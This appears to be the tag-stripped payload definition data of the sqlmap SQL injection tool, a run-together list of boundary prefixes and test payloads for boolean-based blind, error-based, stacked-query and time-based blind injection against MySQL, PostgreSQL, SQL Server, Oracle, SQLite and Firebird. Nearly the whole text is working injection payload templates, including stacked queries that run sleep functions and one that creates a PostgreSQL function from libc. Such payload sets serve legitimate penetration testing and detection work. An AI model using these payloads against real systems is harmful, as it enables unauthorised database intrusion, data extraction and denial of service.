101,2,31111,21)AND ([RANDNUM]=[RANDNUM]211,21))AND (([RANDNUM]=[RANDNUM]311,21)))AND ((([RANDNUM]=[RANDNUM]111,22'AND '[RANDSTR]'='[RANDSTR]111,22')AND ('[RANDSTR]'='[RANDSTR]211,22'))AND (('[RANDSTR]'='[RANDSTR]311,22')))AND ((('[RANDSTR]'='[RANDSTR]211,23'AND '[RANDSTR]' LIKE '[RANDSTR]211,23')AND ('[RANDSTR]' LIKE '[RANDSTR]311,23'))AND (('[RANDSTR]' LIKE '[RANDSTR]311,23')))AND ((('[RANDSTR]' LIKE '[RANDSTR]211,24"AND "[RANDSTR]"="[RANDSTR]311,24")AND ("[RANDSTR]"="[RANDSTR]411,24"))AND (("[RANDSTR]"="[RANDSTR]411,24")))AND ((("[RANDSTR]"="[RANDSTR]311,25"AND "[RANDSTR]" LIKE "[RANDSTR]411,25")AND ("[RANDSTR]" LIKE "[RANDSTR]511,25"))AND (("[RANDSTR]" LIKE "[RANDSTR]511,25")))AND ((("[RANDSTR]" LIKE "[RANDSTR]22,31,21,AND boolean-based blind - WHERE clause11111AND [RANDNUM]=[RANDNUM]AND [RANDNUM]=[RANDNUM1]OR boolean-based blind - WHERE clause14311OR [RANDNUM]=[RANDNUM]OR [RANDNUM]=[RANDNUM1]MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses1312,31(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))MySQL>= 5.0MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses1412,31(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))MySQL< 5.0Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause13131(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))Microsoft SQL ServerOracle boolean-based blind - ORDER BY clause13131(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END) FROM DUAL)(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/0 END) FROM DUAL)OracleGeneric boolean-based blind - GROUP BY and ORDER BY clauses1312,31(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/0 END))MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses1412,33(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))MySQL>= 5.0MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses1512,33(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))MySQL< 5.0Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause14133(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))Microsoft SQL ServerOracle boolean-based blind - ORDER BY clause14133(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END) FROM DUAL)(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/0 END) FROM DUAL)OracleGeneric boolean-based blind - GROUP BY and ORDER BY clauses1412,33(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/0 END))MySQL >= 5.0 error-based - WHERE clause21011AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[ERROR_START_CHAR]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[ERROR_END_CHAR]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)[ERROR_START_CHAR](?P<result>.*?)[ERROR_END_CHAR]MySQL>= 5.0PostgreSQL error-based - WHERE clause21011AND [RANDNUM]=CAST('[ERROR_START_CHAR]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[ERROR_END_CHAR]' AS NUMERIC)[ERROR_START_CHAR](?P<result>.*?)[ERROR_END_CHAR]PostgreSQLMicrosoft SQL Server/Sybase error-based - WHERE clause21011AND [RANDNUM]=CONVERT(INT,('[ERROR_START_CHAR]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[ERROR_END_CHAR]'))[ERROR_START_CHAR](?P<result>.*?)[ERROR_END_CHAR]Microsoft SQL ServerOracle error-based - WHERE clause21011AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[ERROR_START_CHAR]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[ERROR_END_CHAR]'||CHR(62))) FROM DUAL)[ERROR_START_CHAR](?P<result>.*?)[ERROR_END_CHAR]OracleMySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses2302,31(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[ERROR_START_CHAR]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[ERROR_END_CHAR]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)[ERROR_START_CHAR](?P<result>.*?)[ERROR_END_CHAR]MySQL>= 5.0PostgreSQL error-based - GROUP BY and ORDER BY clauses2302,31(CAST('[ERROR_START_CHAR]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[ERROR_END_CHAR]' AS NUMERIC))[ERROR_START_CHAR](?P<result>.*?)[ERROR_END_CHAR]PostgreSQLMicrosoft SQL Server/Sybase error-based - ORDER BY clause23031(CONVERT(INT,('[ERROR_START_CHAR]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[ERROR_END_CHAR]')))[ERROR_START_CHAR](?P<result>.*?)[ERROR_END_CHAR]Microsoft SQL ServerOracle error-based - ORDER BY clause23031(SELECT UPPER(XMLType(CHR(60)||'[ERROR_START_CHAR]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[ERROR_END_CHAR]'||CHR(62))) FROM DUAL)[ERROR_START_CHAR](?P<result>.*?)[ERROR_END_CHAR]OracleMySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses2402,33(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[ERROR_START_CHAR]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[ERROR_END_CHAR]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)[ERROR_START_CHAR](?P<result>.*?)[ERROR_END_CHAR]MySQL>= 5.0PostgreSQL error-based - GROUP BY and ORDER BY clauses2402,33(CAST('[ERROR_START_CHAR]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[ERROR_END_CHAR]' AS NUMERIC))[ERROR_START_CHAR](?P<result>.*?)[ERROR_END_CHAR]PostgreSQLMicrosoft SQL Server/Sybase error-based - ORDER BY clause24033(CONVERT(INT,('[ERROR_START_CHAR]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[ERROR_END_CHAR]')))[ERROR_START_CHAR](?P<result>.*?)[ERROR_END_CHAR]Microsoft SQL ServerOracle error-based - ORDER BY clause24033(SELECT UPPER(XMLType(CHR(60)||'[ERROR_START_CHAR]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[ERROR_END_CHAR]'||CHR(62))) FROM DUAL)[ERROR_START_CHAR](?P<result>.*?)[ERROR_END_CHAR]OracleMySQL > 5.0.11 stacked queries41001; SELECT SLEEP([SLEEPTIME]);--MySQL> 5.0.11MySQL < 5.0.12 stacked queries42001; SELECT BENCHMARK(5000000, MD5('[SLEEPTIME]'));--MySQL< 5.0.12PostgreSQL > 8.1 stacked queries41001; SELECT PG_SLEEP([SLEEPTIME]);--PostgreSQL> 8.1PostgreSQL < 8.2 stacked queries - exists function43001; SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1, 3000000));--PostgreSQL< 8.2PostgreSQL < 8.2 stacked queries - Glibc44001; CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME]);--PostgreSQL< 8.2LinuxMicrosoft SQL Server/Sybase stacked queries41001; WAITFOR DELAY '0:0:[SLEEPTIME]';--Microsoft SQL ServerOracle stacked queries43001; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END;--OracleOracle stacked queries45001; EXEC DBMS_LOCK.SLEEP([SLEEPTIME].00);--OracleOracle stacked queries45001; EXEC USER_LOCK.SLEEP([SLEEPTIME].00);--OracleSQLite > 2.0 stacked queries43001; SELECT LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))));--SQLite> 2.0Firebird stacked queries43001; SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6;--Firebird> 2.0MySQL > 5.0.11 AND time-based blind51111AND SLEEP([SLEEPTIME])MySQL> 5.0.11MySQL < 5.0.12 AND time-based blind52111AND BENCHMARK(5000000, MD5('[SLEEPTIME]'))MySQL< 5.0.12PostgreSQL > 8.1 AND time-based blind51111AND PG_SLEEP([SLEEPTIME])PostgreSQL> 8.1SQLite > 2.0 AND time-based blind53111AND LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))SQLite> 2.0Firebird AND time-based blind54111AND (COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0Firebird> 2.0MySQL > 5.0.11 OR time-based blind52311OR SLEEP([SLEEPTIME])MySQL> 5.0.11MySQL < 5.0.12 OR time-based blind53311OR BENCHMARK(5000000, MD5('[SLEEPTIME]'))MySQL< 5.0.12PostgreSQL > 8.1 OR time-based blind52311OR PG_SLEEP([SLEEPTIME])PostgreSQL> 8.1SQLite > 2.0 OR time-based blind54311OR LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))SQLite> 2.0Firebird OR time-based blind55311OR (COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0Firebird> 2.0